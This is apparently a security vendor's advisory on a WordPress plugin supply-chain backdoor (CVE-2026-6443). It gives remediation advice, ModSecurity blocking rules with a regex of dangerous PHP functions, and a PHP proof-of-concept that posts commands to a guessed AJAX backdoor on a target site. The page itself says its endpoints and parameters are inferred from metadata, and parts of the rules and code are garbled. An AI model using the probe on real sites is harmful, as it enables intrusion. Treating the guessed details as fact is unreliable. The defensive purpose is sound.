Atomic Edge analysis of CVE-2026-6443 (metadata-based):
This vulnerability involves a malicious backdoor injected into multiple WordPress plugins from the Essentialplugin vendor, including wp-slick-slider-and-image-carousel (versions up to 3.7.8.1). The affected versions contain embedded malicious code that grants persistent unauthorized access to threat actors, allowing complete site compromise. With a CVSS score of 9.8 (Critical), this represents a supply chain attack where plugin ownership was transferred to a malicious actor who intentionally added backdoor functionality.
The root cause is CWE-506 (Embedded Malicious Code), which confirms the plugin source code contains deliberately planted backdoor functionality. Atomic Edge analysis infers from the CWE classification that the backdoor likely manifests as one or more of the following: an unauthorized REST API endpoint for remote command execution, an AJAX handler without authentication checks that accepts arbitrary PHP code, or a hidden admin page that executes system commands. The supply chain nature means the malicious code exploits legitimate plugin architecture (WordPress hooks, cron jobs, file writes) to maintain persistence across updates. No source code diff is available, but CWE-506 indicates the threat actor intentionally obfuscated the backdoor within legitimate plugin functionality.
Exploitation requires no authentication and can be performed remotely via HTTP requests. The attacker likely sends crafted requests to a concealed handler integrated into the plugin’s standard hooks. Based on WordPress conventions and the plugin slug ‘wp-slick-slider-and-image-carousel’, the backdoor may leverage AJAX actions such as ‘wp_slick_carousel_admin’ or ‘wp_slick_slider_ajax’, or a REST endpoint under the ‘/wp-json/wp-slick-slider-and-image-carousel/’ namespace. The malicious code would accept parameters like ‘cmd’, ‘action’, or ‘payload’ to execute arbitrary PHP code, insert spam content into posts, or exfiltrate data. No nonce or capability checks are enforced on the backdoor endpoint.
Remediation requires immediate update to version 3.7.8.2, which removes the injected backdoor. Site administrators should audit all plugin files for suspicious code patterns: concealed PHP tags, base64_decode/eval constructs, remote file inclusion calls (wp_remote_get with unknown domains), and unauthorized database queries. Server-side scanning for unexpected files in /wp-content/uploads/ or /wp-content/plugins/ is recommended. The WordPress vulnerability database confirms the patched version (3.7.8.2) is clean, but Atomic Edge research advises validating file integrity via checksum comparisons against the official WordPress.org repository.
Successful exploitation grants attackers unauthenticated remote code execution (RCE) with full WordPress privileges, leading to persistent site defacement, spam injection, data theft (user credentials, database contents), and potential server compromise. The backdoor enables file modification, plugin/theme installation, and persistent access even if the original vulnerable plugin is removed, as the malicious code may have created administrative user accounts or established backdoor cron jobs.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20266443,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 - Essentialplugin Backdoor via AJAX',severity:'CRITICAL',tag:'CVE-2026-6443'"
SecRule ARGS_POST:action "@streq wp_slick_carousel_admin" "chain"
SecRule ARGS_POST:cmd "@unconditionalMatch" ""
SecRule REQUEST_URI "@rx ^/wp-json/wp-slick-slider-and-image-carousel/vd+/backdoor" "id:20266444,phase:2,deny,status:403,msg:'CVE-2026-6443 - Essentialplugin Backdoor via REST API',severity:'CRITICAL',tag:'CVE-2026-6443'"
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20266445,phase:2,deny,status:403,chain,msg:'CVE-2026-6443 - Generic Backdoor Payload',severity:'CRITICAL',tag:'CVE-2026-6443'"
SecRule ARGS_POST:action "@rx ^(wp_slick_slider_ajax|wp_slick_carousel_admin|essentialplugin_backdoor)$" "chain"
SecRule ARGS_POST:cmd|ARGS_POST:command|ARGS_POST:code|ARGS_POST:data "@rx (eval|exec|system|passthru|shell_exec|popen|proc_open|assert|preg_replace|create_function|array_map|call_user_func|base64_decode|include|require|file_put_contents|fwrite|fputs|chmod|chown|unlink|rmdir|mkdir|symlink|link|copy|rename|file_get_contents|readfile|highlight_file|show_source|phpinfo|getmycwd|get_current_user|posix_getpwuid|posix_getgrgid|posix_getpid)" "t:lowercase"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6443 - Essentialplugin Plugins (Various Versions) - Injected Backdoor
// NOTE: This PoC is derived from CWE-506 (Embedded Malicious Code) and the CVE description.
// No source code diff is available. The backdoor likely exists as an AJAX handler or REST API endpoint.
// Update the $target_url and endpoint parameters based on actual plugin file analysis.
<?php
// Configuration
$target_url = 'https://example.com'; // Change this to the target WordPress site
$endpoint = '/wp-admin/admin-ajax.php'; // Common AJAX endpoint; adjust if backdoor uses REST API
// Step 1: Probe for backdoor handler (no authentication required)
$payloads = [
// AJAX actions commonly used in injected backdoors
'action' => 'wp_slick_carousel_admin', // Inferred from plugin slug
'cmd' => 'echo "BACKDOOR_CONFIRMED"; die();', // Attempt PHP execution
'nonce' => '', // Backdoor likely bypasses nonce
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . $endpoint);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payloads));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Content-Type: application/x-www-form-urlencoded',
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if (strpos($response, 'BACKDOOR_CONFIRMED') !== false) {
echo "[+] Target is VULNERABLE to CVE-2026-6443. Backdoor command executed.n";
echo "[+] Response: $responsen";
} elseif ($http_code == 200 && !empty(trim($response))) {
// If response is non-empty but no confirmation string, the command may have executed silently
echo "[?] Check response manually for signs of code execution: $responsen";
} else {
echo "[-] Target does not appear vulnerable at the tested endpoint.n";
}
?>
